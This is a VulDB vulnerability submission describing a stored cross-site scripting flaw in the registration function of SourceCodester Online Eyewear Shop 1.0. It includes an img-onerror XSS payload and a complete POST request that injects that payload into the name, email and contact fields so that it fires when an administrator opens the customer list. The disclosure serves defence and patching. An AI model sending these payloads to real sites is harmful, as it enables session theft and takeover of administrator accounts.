제출 #85725: SourceCodester Online Eyewear Shop 1.0 Cross-Site Scripting 정보

제목SourceCodester Online Eyewear Shop 1.0 Cross-Site Scripting
설명The application Online Eyewear Shop 1.0 is vulnerable to Stored Cross-Site Scripting attacks. The vulnerability is triggered by sending a specially crafted POST request as a customer user to the following URL: - http://localhost/oews/classes/Users.php?f=registration The vulnerable function corresponds to "registration" within the following source code file: - oews/classes/Users.php This function allows to register a new customer user or to edit an already existing one. The application does not correctly sanitize the input provided by the user and the XSS payload "><img src=X onerror=prompt(document.cookie)> could be uploaded within any of the following parameters: - "firstname" - "middlename" - "lastname" - "email" - "contact" Here an example of POST request: ''' POST /oews/classes/Users.php?f=registration HTTP/1.1 Host: localhost Content-Type: multipart/form-data; boundary=---------------------------110352294825610921354088773808 Content-Length: 1274 Connection: close Cookie: PHPSESSID=lmpi80mm6i466es8arcrfj78vo -----------------------------110352294825610921354088773808 Content-Disposition: form-data; name="id" 4 -----------------------------110352294825610921354088773808 Content-Disposition: form-data; name="firstname" XSS"><img src=X onerror=prompt(1)> -----------------------------110352294825610921354088773808 Content-Disposition: form-data; name="middlename" "><img src=X onerror=prompt(2)> -----------------------------110352294825610921354088773808 Content-Disposition: form-data; name="lastname" TEST"><img src=X onerror=prompt(3)> -----------------------------110352294825610921354088773808 Content-Disposition: form-data; name="gender" Male -----------------------------110352294825610921354088773808 Content-Disposition: form-data; name="email" [email protected]"><img src=X onerror=prompt(5)> -----------------------------110352294825610921354088773808 Content-Disposition: form-data; name="contact" 444"><img src=X onerror=prompt(6)> -----------------------------110352294825610921354088773808 Content-Disposition: form-data; name="password" -----------------------------110352294825610921354088773808 Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream -----------------------------110352294825610921354088773808-- ''' This set of information is stored inside the database for the current user and the script is executed anytime the related fields are printed out on the website. For this reason, any administrator user could be a potential victim of this attack if she tries to edit that customer or by simply accessing to the "Customer List View". This view (located at the URL "http://localhost/oews/admin/?page=customers") shows the value of the following fields: - First Name - Middle Name - Last Name - Email
사용자
 CP_offensive_team (UID 40465)
제출2023. 02. 07. PM 06:07 (3 연령 ago)
모더레이션2023. 02. 07. PM 08:59 (3 hours later)
상태수락
VulDB 항목220369 [SourceCodester Online Eyewear Shop 1.0 POST Request oews/classes/Users.php registration firstname/middlename/lastname/email/contact 크로스 사이트 스크립팅]
포인트들17

Want to know what is going to be exploited?

We predict KEV entries!